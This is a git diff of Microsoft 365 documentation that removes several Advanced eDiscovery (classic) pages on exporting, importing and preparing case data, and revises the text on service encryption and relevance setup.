-3. If you select **Include only files above Relevance cut-off score**, then the **Issue** is enabled. If the file's relevance score is higher than the cut-off score for the selected issue, the file will be exported unless it's excluded by the 'For review' filter.
-
- If you select **Refine export batch**, the **De-dupe** and Filter by 'For review' field radio buttons are enabled. If you choose **De-dupe**, then duplicate files will be filtered out according to the policy defined [Case level (default): from every set of duplicate files in the entire case, all but one file will be de-duped. Custodian level: from every set of duplicate files of the same custodian, all but one file will be de-duped.] The export output contains a record of all duplicate files. If you choose **Filter by 'For review'** field, select **Modify under Metadata** to enter your **'For review'** field settings. Select **Include input files** to include source files in the package content. You can clear this setting to speed up the export process. Note that the Native files will be exported in any case.
-
-4. Under **Metadata**, select from the following options in the **Export template** list (once per session).
-
- - **Standard**: Basic set of data items, metadata, and properties. Use this option when import data was already processed in Advanced eDiscovery and export data is uploaded to a system that already contains the files. By default, export template columns are created and filled.
-
- - **All**: Full set of standard metadata including all processing data, as well as Analyze and Relevance scores. This template is required when Advanced eDiscovery performs the processing and file data is uploaded to an external system for the first time.
-
- - **Issues**: Select **All Issues** or select a particular issue you have created.
-
-5. Under **Destination**:
-
- - **Download to local machine**
-
- - **Export to user-defined Azure blob**: If this is checked, you can specify a container URL and SAS token.
-
- > [!NOTE]
- > Once an export package is stored to the user defined Azure blob, the data is no longer managed by Advanced eDiscovery; it's managed by the Azure blob. This means if you delete the case, the exported files will still remain on the Azure blob.
-
- - **Save SAS token for future export session**: If checked, the SAS token will be encrypted in the Advanced eDiscovery's internal database for future use.
-
- > [!NOTE]
- > Currently the SAS token expires after a month. If you try to download after more than a month you have to undo last session, then export again.
-
-6. Click **Modify** to set the 'for review' field settings.
-
- ![Set up For review field settings for an export batch](../media/39451aba-f6fe-4a01-8ed0-0be6a6ce889a.png)
-
- - Under **For review field settings**, in **Select scenario** pull-down list, select the scenario and scope of the review. The settings are displayed based on your selection.
-
- - **Review all** (default): All emails, attachments, and documents are selected by default.
-
- - **Review all unique content in a set**: Inclusives and unique inclusive copies, unique attachments in email set level, representative from every set of exact duplicates.
-
- - **Review all unique content in a set - no inclusive copies**: Inclusives, unique attachments in email set level, representative from every set of exact duplicates.
-
- - **Review all unique content and related family files**: Inclusives, unique attachments in email set level, representative from every set of exact duplicates, expand to include family files.
-
- - **Custom** (allows you to define the options in the dialog): The default is to keep current selections and enable all dialog options, to allow their selection. If you select this option, you can then customize the settings for emails, documents, attachments and miscellaneous.
-
- - Under **Emails**, select the emails you want to export.
-
- - **All emails**: (default) All emails are selected.
-
- - **Inclusives**: An inclusive email is a last email of a thread, and it contains all the other emails from the thread.
-
- - **Inclusives and unique inclusive copies**: Inclusive copies and inclusives with the same subject, body and attachments; unique inclusive copies are unique copies of these emails .
-
- - Under **Documents**, select the documents you want to export.
-
- - **All documents**: (default) All documents are selected.
-
- - **Pivots**: A file chosen as representative of near-duplicates set, which is typically used as the baseline when reviewing the set.
-
- - **Representative from every set of exact duplicates**: Unique near-duplicate files (including the pivot).
-
- - Under **Attachments**, select the attachments you want to export.
-
- - **All attachments**: (default) All attachments are selected.
-
- - **Unique attachment in case level**: Unique attachment files within the specified case.
-
- - **Unique attachment in email set level**: Unique attachment files within the specified email case.
-
- - Under**Micellaneous**, you can choose to **Treat attachments as documents**, **Treat emails as documents**, or **Expand to include family files**. When you choose **Expand to include family files**, for each file that is flagged for review, all files of the same family will also be flagged.
-
-7. Choose **Save** to save the settings.
-
-8. After you specify export parameters, to start export batch, click **Create export session**.
-
- During export, the status is displayed in **Task status**. The results are displayed in **Export summary**.
-
-9. In the **Download files** window, click **Copy to clipboard** to copy the Export key.
-
- ![Download files](../media/99cf2c13-4954-479f-9741-80d7458c1a15.png)
-
-10. Click **Close**.
-
- The eDiscovery Export Tool is started.
-
- ![eDiscovery export tool](../media/705756ca-ee97-4d24-b70f-8b23513f6d11.gif)
-
-11. In the **eDiscovery Export Tool**:
-
- - In **Paste the Shared Access Signature that will be used to connect to the source**, paste the Export key that you copied to the clipboard in step 7.
-
- - Click **Browse** to select the target location for storing the downloaded export files on the local machine.
-
- - Click **Start**.The export files are downloaded to the local machine. If you chose **Export to user-defined Azure blob** in step 4, the session is exported to a Blob storage URL destination of your choosing.
-
-For a full description of the fields in the export report, see [Export report fields](export-report-fields-in-advanced-ediscovery.md).
-
-## Export report output files
-<a name="BK_ExportOutputFIles"> </a>
-
-The following table lists the output files that are generated when you run an Export batch.
-
-|**File name**|**File type**|**Description**|
-|:-----|:-----|:-----|
-|Export summary <br/> |csv <br/> |A log file generated by the eDiscovery Export Tool. <br/> |
-|Trace <br/> |txt <br/> |A log file generated by the eDiscovery Export Tool. <br/> |
-|Extracted text files <br/> |File folder <br/> |Folder that contains the extracted text files of the exported files. <br/> |
-|Input or native files <br/> |File folder <br/> |Folder that contains the native and input files of the exported files. <br/> |
-|Export list <br/> |xlsx <br/> |Exported files metadata in xlsx format. Fields in files are according to template user selects to export. If needed, several files are created, each contains 100-150K rows. If a certain value contains more characters than an Excel cell can contain (currently the limit is 32,767 characters), then the value will be trimmed to the maximum length allowed. If a value is trimmed, the cell's background color is red to indicate this to the user."Email participants" is an example of a field that can exceed the length limit, if the email was sent to a large distribution. See [Export report fields](export-report-fields-in-advanced-ediscovery.md) for details about the output fields. <br/> |
-|Load file <br/> |csv <br/> |Exported files metadata in csv format for loading into a different application. Fields in files are according to template user selects to export. <br/> |
-|Success indicator <br/> |txt <br/> |Only created when exporting to a 3rd party Azure blob. If export succeed completely, the file will be created. In case of failure, or partial success the file will not be created. File will be created in the root folder, allowing automated tracking on different Export batches/sessions statuses. This is an empty file. Its name is: TenantId_CaseId_ExternalCaseId_CaseName_ExportBatchId_SessionId_DateTime.txt. <br/> |
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Viewing batch history and exporting past results](view-batch-history-and-export-past-results.md)
-
-[Quick setup for Advanced eDiscovery](quick-setup-for-advanced-ediscovery.md)
-
-[Export report fields](export-report-fields-in-advanced-ediscovery.md)
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/import-non-office-365-data-into-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/import-non-office-365-data-into-advanced-ediscovery.md deleted file mode 100644
@@ -1,85 +0,0 @@
-title: "Import non-Microsoft 365 content for Advanced eDiscovery analysis"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: ITPro
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- OEC150-- MET150
-ms.assetid: 0ee60763-a30b-495b-8543-971c3384a801
-description: "How to steps to import content that is not stored in Microsoft 365 into an Azure blob so that it can be analyzed with AeD"
-ms.custom: seo-marvel-apr2020
-
-# Import non-Microsoft 365 content for Advanced eDiscovery (classic) analysis
-
-Not all documents that you may need to analyze with Advanced eDiscovery will live in Microsoft 365. With the Non-Microsoft 365 content import feature in Advanced eDiscovery you can upload documents that don't live in Microsoft 365 (except PST files) into a case linked, Azure storage blob and analyze them with Advanced eDiscovery. This procedure shows you how to bring your non-Microsoft 365 documents into Advanced eDiscovery for analysis.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-> [!NOTE]
-> You can purchase an Advanced eDiscovery data storage add-on subscription for your non-Microsoft 365 content. This is exclusively available for content that is to be analyzed with Advanced eDiscovery. Follow the steps in [Buy or edit an add-on for Microsoft 365 for business](https://docs.microsoft.com/microsoft-365/commerce/buy-or-edit-an-add-on) and purchase the Advanced eDiscovery storage add-on.
-
-## Requirements to upload non-Office 365 content
-
-Using the upload Non-Office 365 feature as described in this procedure requires that you have:
-
-- An Office 365 E3 with Advanced Compliance add-on or E5 subscription.
-
-- All custodians whose non-Office 365 content will be uploaded must have E3 with Advanced Compliance add-on or E5 licenses.
-
-- An existing eDiscovery case.
-
-- All the files for uploading gathered into folders where there is one folder per custodian and the folders' name is in this format *alias@domainname* . The *alias@domainname* must be users Office 365 alias and domain. You can collect all the *alias@domainname* folders into a root folder. The root folder can only contain the *alias@domainname* folders, there must be no loose files in the root folder.
-
-- An account that is either an eDiscovery Manager or eDiscovery Administrator.
-
-- [Microsoft Azure Storage Tools](https://aka.ms/downloadazcopy) installed on a computer that has access to the non-Office 365 content folder structure.
-
-## Upload non-Office 365 content into Advanced eDiscovery
--
-1. As an eDiscovery Manager or eDiscovery Administrator, open **eDiscovery**, and open the case that the non-Office 365 data will be uploaded to. If you need to create a case, see [Manage eDiscovery cases in the Security &amp; Compliance Center](ediscovery-cases.md).
-
-2. Click **Switch to Advanced eDiscovery**.
-
-3. Select **Review Sets** from the menu.
-
-4. Select an existing Review Set or choose **Add Review Set**.
-
-5. Select **Manage review set**.
-
-6. In the Non-Office 365 data card, select **View Uploads**.
-
-7. Choose **Upload files** to start the file upload wizard.
-
-8. The first tab is **1. Prepare step**. Select **Next: Upload files**.
-
-9. On the **2. Upload files** tab you will be prompted to download AzCopy.exe if you have not done so already, and then to provide the path to the file location. For example, `C:\Upload` will give you the command to execute AzCopy.exe. Using `C:\Upload`, you will see:
-
- `"%ProgramFiles(x86)%\Microsoft SDKs\Azure\AzCopy\AzCopy.exe" /Source:"c:\upload" /Dest:"https://spnam03salinkexternal003.blob.core.windows.net/16d13440-a6a4-4bc5-a82b-10ac9cfe9d7c-1601401811-externalstore?sv=2017-07-29&sr=c&si=ExternalStore63%7C0&sig=9Dq5v20TwkxByYDHhIEx%2FHSLlmlqUjY0njkJyTO0zGA%3D" /s`
-
-10. Open a command prompt window and execute the AzCopy.exe command to import the data into Azure. Once it has loaded all of the data, select **Next: Process files**.
-
-11. The next tab is **3. Process files** where you will see the custodians that have data associated with them and will also show you the progress of the data being imported.
-
- For more information on Azcopy syntax, see [Transfer data with the AzCopy on Windows](https://docs.microsoft.com/azure/storage/common/storage-use-azcopy).
-
- For more details on Advanced eDiscovery Processing, see [Run the Process module and load data in Advanced eDiscovery (classic)](run-the-process-module-and-load-data-in-advanced-ediscovery.md).
-
- > [!IMPORTANT]
- > There must be one root folder per user and the folder name must be in the <b>alias@domainname</b> format.
-
- > [!IMPORTANT]
- > Once the container is successfully processed in Advanced eDiscovery, you will no longer be able to add new content to the SAS storage in Azure. If you collect additional content and you want to add it to the case for Advanced eDiscovery analysis, you must create a new **Non-Office 365 data** container and repeat this procedure.
-
- > [!NOTE]
- > If the container *does not process successfully due to folder naming issues* and you then fix the issues, you will still have to create a new container and the reconnect and upload again using the procedures in this article.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/manage-relevance-setup-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/manage-relevance-setup-in-advanced-ediscovery.md
@@ -14,6 +14,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: fd6be6d3-2e8d-449d-9851-03ab7546e6aa
+ROBOTS: NOINDEX, NOFOLLOW
description: "Read the recommendations for setting up Relevance training in Advanced eDiscovery to score files by their relevance and generate analytical results." ---
@@ -64,15 +65,4 @@ The parameters described in this section are available in the Advanced eDiscover
- Define and organize issues carefully, as this can impact the Relevance training results.
-After parameters are set, the reviewer / expert can start training the files in the **Relevance** tab.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining issues and assigning users](define-issues-and-assign-users.md)
-
-[Setting up loads to add imported files](set-up-loads-to-add-imported-files.md)
-
-[Defining highlighted keywords and advanced options](define-highlighted-keywords-and-advanced-options.md)
-
+After parameters are set, the reviewer / expert can start training the files in the **Relevance** tab.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/office-365-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/office-365-advanced-ediscovery.md deleted file mode 100644
@@ -1,115 +0,0 @@
-title: "Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: overview
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: fd53438a-a760-45f6-9df4-861b50161ae4
-description: "Learn how Advanced eDiscovery can help you analyze data, streamline document reviews, and make decisions for efficient eDiscovery."
-
-# Advanced eDiscovery (classic)
-
-> [!IMPORTANT]
-> **Advanced eDiscovery (classic) will be permanently retired on December 31, 2020.**<br/>
-> As we continue to invest in newer versions of Advanced eDiscovery, we're announcing the permanent retirement and removal of cases and case data from Advanced eDiscovery (classic).
-> If you're still using Advanced eDiscovery (classic), also known as *Advanced eDiscovery v1.0*, please transition your usage to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. In preparation for the removal of all cases and case data, you can archive case data by [exporting data from a case](https://docs.microsoft.com/microsoft-365/compliance/export-results-in-advanced-ediscovery?view=o365-worldwide).
-> Advanced eDiscovery v2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the previous retirment phases of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-With Advanced eDiscovery, you can better understand your data and reduce your eDiscovery costs. Advanced eDiscovery helps you analyze unstructured data, perform more efficient document review, and make decisions to reduce data for eDiscovery. You can work with data stored in Exchange Online, SharePoint Online, OneDrive for Business, Skype for Business, Microsoft 365 Groups, and Microsoft Teams. You can perform an eDiscovery search in the security and compliance center to search for content in groups, individual mailboxes and sites, and then analyze the search results with Advanced eDiscovery. When you prepare search results for analysis in Advanced eDiscovery, Optical Character Recognition enables the extraction of text from images. This feature allows the powerful text analytic capabilities of Advanced eDiscovery to be applied to image files.
-
-Advanced eDiscovery streamlines and speeds up the document review process by identifying redundant information with features like Near-duplicates detection and Email Thread analysis. The Relevance feature applies predictive coding technology to identify relevant documents. Advanced eDiscovery learns from your tagging decisions on sample documents and applies statistical and self-learning techniques to calculate the relevance of each document in the data set. This enables you to focus on key documents, make quick yet informed decisions on case strategy, cull data, and prioritize review.
-
- **Why advanced eDiscovery?** Advanced eDiscovery builds on the existing set of eDiscovery capabilities in Office 365. For example, you can use the Search feature in the Security &amp; Compliance Center to perform an initial search of all the content sources in your organization to identify and collect the data that may be relevant to a specific legal case. Then you can perform analysis on that data by applying the text analytics, machine learning, and the Relevance/predictive coding capabilities of Advanced eDiscovery. This can help your organization quickly process thousands of email messages, documents, and other kinds of data to find those items that are most likely relevant to a specific
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279). case. The reduced data set can then be exported out of Office 365 for further review.
-
-## Get started
-
-The quickest way to get started with Advanced eDiscovery is to create a case and prepare search results in Security & Compliance Center, load those results in Advanced eDiscovery, and then run Express analysis to analyze that case data and then export the results for external review.
-
-- [Get a quick overview](quick-setup-for-advanced-ediscovery.md) of the Advanced eDiscovery workflow
-
-- [Set up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md) for Advanced eDiscovery by creating a case, assigning eDiscovery permissions, and adding case members, all by using the Security & Compliance Center
-
-- [Prepare and load search data](prepare-data-for-advanced-ediscovery.md) in to the case in Advanced eDiscovery
-
-- [Load non-Office 365 data](import-non-office-365-data-into-advanced-ediscovery.md) in to a case to analyze it in Advanced eDiscovery
-
-- [Use Express analysis](use-express-analysis-in-advanced-ediscovery.md) to quickly analyze the data in a case and then easily export the results
-
-## Analyze data
-
-After search data is loaded into the case in Advanced eDiscovery, you'll use the Analyze module to start analyzing it. The first part of the analysis process consists of organizing files into groups of unique files, duplicates, and near-duplicates (also know as document similarity). Then you organize the data again into hierarchically structured groups of email threads and themes and, optionally, set ignore text filters to exclude certain text from analysis. Then you run the analysis and view the results.
-
-- [Learn about document similarity](understand-document-similarity-in-advanced-ediscovery.md) to prepare you for analyzing data in Advanced eDiscovery
-
-- [Set up the options](set-analyze-options-in-advanced-ediscovery.md) for near-duplicates, themes, and email threading and then run the Analyze module
-
-- [Set up Ignore Text filters](set-ignore-text-in-advanced-ediscovery.md) to exclude text and text strings from being analyzed; these filters will also ignore text when you run Relevance analysis
-
-- [View the results](view-analyze-results-in-advanced-ediscovery.md) of the analysis process
-
-- [Configure advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md) for the analysis process
-
-## Set up Relevance training
-
-Predictive coding (called Relevance) in Advanced eDiscovery lets you train the system on what you're looking for by letting you to make decisions (about whether something is relevant or not) on a small set of documents.
-
-- [Learn about setting up Relevance training](manage-relevance-setup-in-advanced-ediscovery.md) , tagging files that are relevant to a case, and defining case issues
-
-- [Define case issues](define-issues-and-assign-users.md) and assign each issue to a user who will train the files
-
-- [Add imported files to current or new load](set-up-loads-to-add-imported-files.md) that will be added to the Relevance training. A load is a new batch of files that are added to a case and then used for Relevance training
-
-- [Define highlighted keywords](define-highlighted-keywords-and-advanced-options.md) that can be added to the Relevance training. This helps you better identify files that are relevant to a case
-
-## Run the Relevance module
-
-After set up training, you're ready to run the Relevance module and assess the effectiveness of the training settings. This results in a relevance ranking that helps you decide if you need to perform additional training or if you're ready to start tagging files as relevant to your case.
-
-- [Learn about the Relevance process](use-relevance-in-advanced-ediscovery.md) and the iterative process of assessment, tagging, tracking, and retraining based on sample set of files
-
-- [Learn about assessment](assessment-in-relevance-in-advanced-ediscovery.md) , where an expert familiar with the case reviews a set of case files and determines the effectiveness of the Relevance training
-
-- [Assess case files](tagging-and-assessment-in-advanced-ediscovery.md) to calculate the effectiveness (called *richness) of training settings, and then tag files as relevant or not relevant to your case. This helps you determine if the current training is sufficient or if you should adjust the training settings.
-
-- [Perform the relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md) after assessment is complete, and then once again tag files as relevant or not relevant to the issues you've defined for the case
-
-- [Track the Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md) process to determine if Relevance training has achieved your assessment target (known as a *stable training status) or whether more training is needed; you can also view the Relevance results for each case issue
-
-- [Make decisions based on Relevance analysis](decision-based-on-the-results-in-advanced-ediscovery.md) to determine the size of the resulting set of case files that can be exported for review
-
-- [Test the quality of the Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md) to validate the culling decisions made during the Relevance process
-
-## Export results
-
-The final step in analyzing case data in Advanced eDiscovery is to export results of the analysis for external review.
-
-- [Learn about exporting case data](export-case-data-in-advanced-ediscovery.md)
-
-- [Export case data](export-results-in-advanced-ediscovery.md)
-
-- [View batch history and export past results](view-batch-history-and-export-past-results.md)
-
-- [Export report fields](export-report-fields-in-advanced-ediscovery.md)
-
-## Other Advanced eDiscovery tools
-
-Advanced eDiscovery provides additional tools and capabilities beyond analyzing case data, relevance analysis, and exporting data.
-
-- [Run Advanced eDiscovery reports](run-reports-in-advanced-ediscovery.md)
-
-- [Define case and tenant settings](define-case-and-tenant-settings-in-advanced-ediscovery.md)
-
-- [Advanced eDiscovery utilities](use-advanced-ediscovery-utilities.md)
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/office-365-service-encryption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/office-365-service-encryption.md
@@ -21,20 +21,20 @@ description: "Summary: Understand data resiliency in Microsoft Office 365."
In addition to using volume-level encryption, Exchange Online, Skype for Business, SharePoint Online, and OneDrive for Business also use Service Encryption to encrypt customer data. Service Encryption allows for two key management options: ## Microsoft managed keys
-Microsoft manages all cryptographic keys including the root keys for service encryption. This option is currently available in SharePoint Online and OneDrive for Business. This option is currently being rolled out for Exchange Online. Microsoft managed keys provide default service encryption unless you decide to onboard using Customer Key. If, at a later date, you decide to stop using Customer Key without following the data purge path, then your data stays encrypted using the Microsoft managed keys. Your data is always encrypted at this default level at a minimum.
+Microsoft manages all cryptographic keys including the root keys for service encryption. This option is currently enabled by default for Exchange Online, SharePoint Online, OneDrive for Business. Microsoft managed keys provide default service encryption unless you decide to onboard using Customer Key. If, at a later date, you decide to stop using Customer Key without following the data purge path, then your data stays encrypted using the Microsoft managed keys. Your data is always encrypted at this default level at a minimum.
## Customer Key You supply root keys used with service encryption and you manage these keys using Azure Key Vault. Microsoft manages all other keys. This option is called Customer Key, and it is currently available for Exchange Online, SharePoint Online, and OneDrive for Business. (Previously referred to as Advanced Encryption with BYOK. See [Enhancing transparency and control for Office 365 customers](https://blogs.office.com/2015/04/21/enhancing-transparency-and-control-for-office-365-customers/) for the original announcement.)
-Service encryption provides multiple benefits. For example, Customer Key:
+Service encryption provides multiple benefits:
-- Provides rights protection and management features on top of strong encryption protection.
+- Provides an added layer of protection on top of bitlocker.
-- Includes a Customer Key option that enables multi-tenant services to provide per-tenant key management.
+- Provides separation of Windows operating system administrators from access to application data stored or processed by the operating system.
-- Provides separation of Windows operating system administrators from access to customer data stored or processed by the operating system.
+- Includes a Customer Key option that enables multi-tenant services to provide per-tenant key management.
-- Enhances the ability of Microsoft 365 to meet the demands of customers that have compliance requirements regarding encryption.
+- Enhances the ability of Microsoft 365 to meet the demands of customers that have specific compliance requirements regarding encryption.
Using Customer Key, you can generate your own cryptographic keys using either an on-premises Hardware Service Module (HSM) or Azure Key Vault (AKV). Regardless of how you generate the key, you use AKV to control and manage the cryptographic keys used by Office 365. Once your keys are stored in AKV, they can be used as the root of one of the keychains that encrypts your mailbox data or files.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-data-for-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/prepare-data-for-advanced-ediscovery.md deleted file mode 100644
@@ -1,76 +0,0 @@
-title: "Prepare data for Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 2fb94c23-1846-4a0e-994d-da6d02445f15
-description: "Learn how to use the Security &amp; Compliance Center to prepare data for analysis with Advanced eDiscovery."
-
-# Prepare data for Advanced eDiscovery (classic)
-
-This topic describes how to load the results of a Content Search in to a case in Advanced eDiscovery (classic).
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-## Step 1: Prepare data for Advanced eDiscovery
-
-To analyze data with Advanced eDiscovery, you can use the results of a Content Search that you run in the Microsoft 365 Security &amp; Compliance Center (listed on the **Content search** page in the Microsoft 365 Security &amp; Compliance Center) or a search associated with an eDiscovery case (listed on the **eDiscovery** page in the Security &amp; Compliance Center).
-
-For the detailed steps on preparing search results for analysis in Advanced eDiscovery, see [Prepare search results for Advanced eDiscovery](prepare-search-results-for-advanced-ediscovery.md).
-
-> [!NOTE]
-> If you have data outside of Microsoft 365 and want to import it to Microsoft 365 so that you can prepare and analyze it in Advanced eDiscovery, a see [Overview of importing PST files to Microsoft 365](https://docs.microsoft.com/microsoft-365/compliance/importing-pst-files-to-office-365) and [Archiving third-party data](https://www.microsoft.com/?ref=go).
-
-## Step 2: Load search result data in to a case in Advanced eDiscovery
-
-After you prepare the search results in the Security &amp; Compliance Center for analysis, the next step is to load the search results in to a case in Advanced eDiscovery. For more detailed information, see [Run the Process module](run-the-process-module-in-advanced-ediscovery.md).
-
-1. Go to [https://protection.office.com](https://protection.office.com).
-
-2. Sign in using your work or school account.
-
-3. In the Security &amp; Compliance Center, click **Search &amp; investigation** \> **eDiscovery** to display the list of cases in your organization.
-
-4. Click **Open** next to the case that you want to load data in to in Advanced eDiscovery.
-
-5. On the **Home** page for the case, click **Switch to Advanced eDiscovery**.
-
- ![Click Switch to Advanced eDiscovery to open the case in Advanced eDiscovery](../media/8e34ba23-62e3-4e68-a530-b6ece39b54be.png)
-
- The **Connecting to Advanced eDiscovery** progress bar is displayed. When you're connected to Advanced eDiscovery, a list of containers is displayed on the setup page for the case.
-
- ![The case is displayed in Advanced eDiscovery](../media/8036e152-70dc-4bb7-9379-61c1ed8326b4.png)
-
- These containers represent the search results that you prepared for analysis in Advanced eDiscovery in Step 1. Note that the name of the container has the same name as the Content Search in the case in the Security &amp; Compliance Center. The containers in the list are the ones that you prepared. If a different user prepared search results for Advanced eDiscovery, the corresponding containers won't be included in the list.
-
-6. To load the search result data from a container in to the case in Advanced eDiscovery, select a container and then click **Process**.
-
-After the search results from the Security &amp; Compliance Center are added to the case in Advanced eDiscovery, the next step is to use the tools in Advanced eDiscovery to analyze and cull the data that's relevant to the case.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Set up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md)
-
-[Analyzing case data](analyze-case-data-with-advanced-ediscovery.md)
-
-[Managing Relevance setup](manage-relevance-setup-in-advanced-ediscovery.md)
-
-[Using the Relevance module](use-relevance-in-advanced-ediscovery.md)
-
-[Exporting case data](export-case-data-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-search-results-for-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/prepare-search-results-for-advanced-ediscovery.md deleted file mode 100644
@@ -1,121 +0,0 @@
-title: "Prepare search results for Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-audience: Admin
-ms.topic: how-to
-f1_keywords:
-- 'ms.o365.cc.CustomizeExportWithZoom'
-ms.service: O365-seccomp
-localization_priority: Normal
-ms.collection:
-- Strat_O365_IP-- M365-security-compliance
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 0b6fac2d-8627-4b05-9df0-03609db6248b
-description: "Learn how to prepare the results of a Content Search in the Security & Compliance Center for further analysis with the Advanced eDiscovery tool."
-ms.custom: seo-marvel-apr2020
-
-# Prepare search results for Advanced eDiscovery (classic)
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-After a search that's associated with an eDiscovery case in the Security & Compliance Center is successfully run, you can prepare the search results for further analysis with Advanced eDiscovery, which lets you analyze large, unstructured data sets and reduce the amount of data that's relevant to a legal case. Advanced eDiscovery features include:
-
-- **Optical character recognition** - When you prepare search results for Advanced eDiscovery, optical character recognition (OCR) functionality automatically extracts text from images, and includes this with the search results that are loaded in to Advanced eDiscovery for analysis. OCR is supported for loose files, email attachments, and embedded images. This allows you to apply the text analytic capabilities of Advanced eDiscovery (near-duplicates, email threading, themes, and predictive coding) to the text content in image files. Advanced eDiscovery OCR supports the following formats for image files:-
- - GIF
- - JPEG
- - JPG
- - PNG
- - TIFF
-
-- **Near-duplicate detection** - Lets you structure your data review more efficiently, so one person reviews a group of similar documents. This helps prevent multiple reviewers from having to view different versions of the same document.
-
-- **Email threading** - Helps you identify the unique messages in an email thread so you can focus on only the new information in each message. In an email thread, the second message contains the first message. Likewise, later messages contain all the previous messages. Email threading removes the need to review every message in its entirety in an email thread.
-
-- **Themes** - Help you get valuable insight about your data beyond just keyword search statistics. Themes help investigations by grouping related documents so you can look at the documents in context. When using themes, you can view the related themes for a set of documents, determine any overlap, and then identify cross-sections of related data.
-
-- **Predictive coding** - Lets you train the system on what you're looking for, by allowing you to make decisions (about whether something is relevant or not) on a small set of documents. Advanced eDiscovery then applies that learning (based on your guidance) when analyzing all of the documents in the data set. Based on that learning, Advanced eDiscovery provides a relevance ranking so you can decide which documents to review based on what document are the most likely to be relevant to the case.
-
-- **Exporting data for review applications** - You can export data from Advanced eDiscovery and Microsoft 365 after you've completed your analysis and reduced the data set. The export package includes a CSV file that contains the properties from the exported content and analytics metadata. This export package can then be imported to an eDiscovery review application.
-
-## Get licenses and permissions
--- To analyze a user's data using Advanced eDiscovery, the user (the custodian of the data) must be assigned an Office 365 E5 license. Alternatively, users with an Office 365 E1 or E3 license can be assigned an Advanced eDiscovery standalone license. Administrators and compliance officers who are assigned to cases and use Advanced eDiscovery to analyze data don't need an E5 license.
-
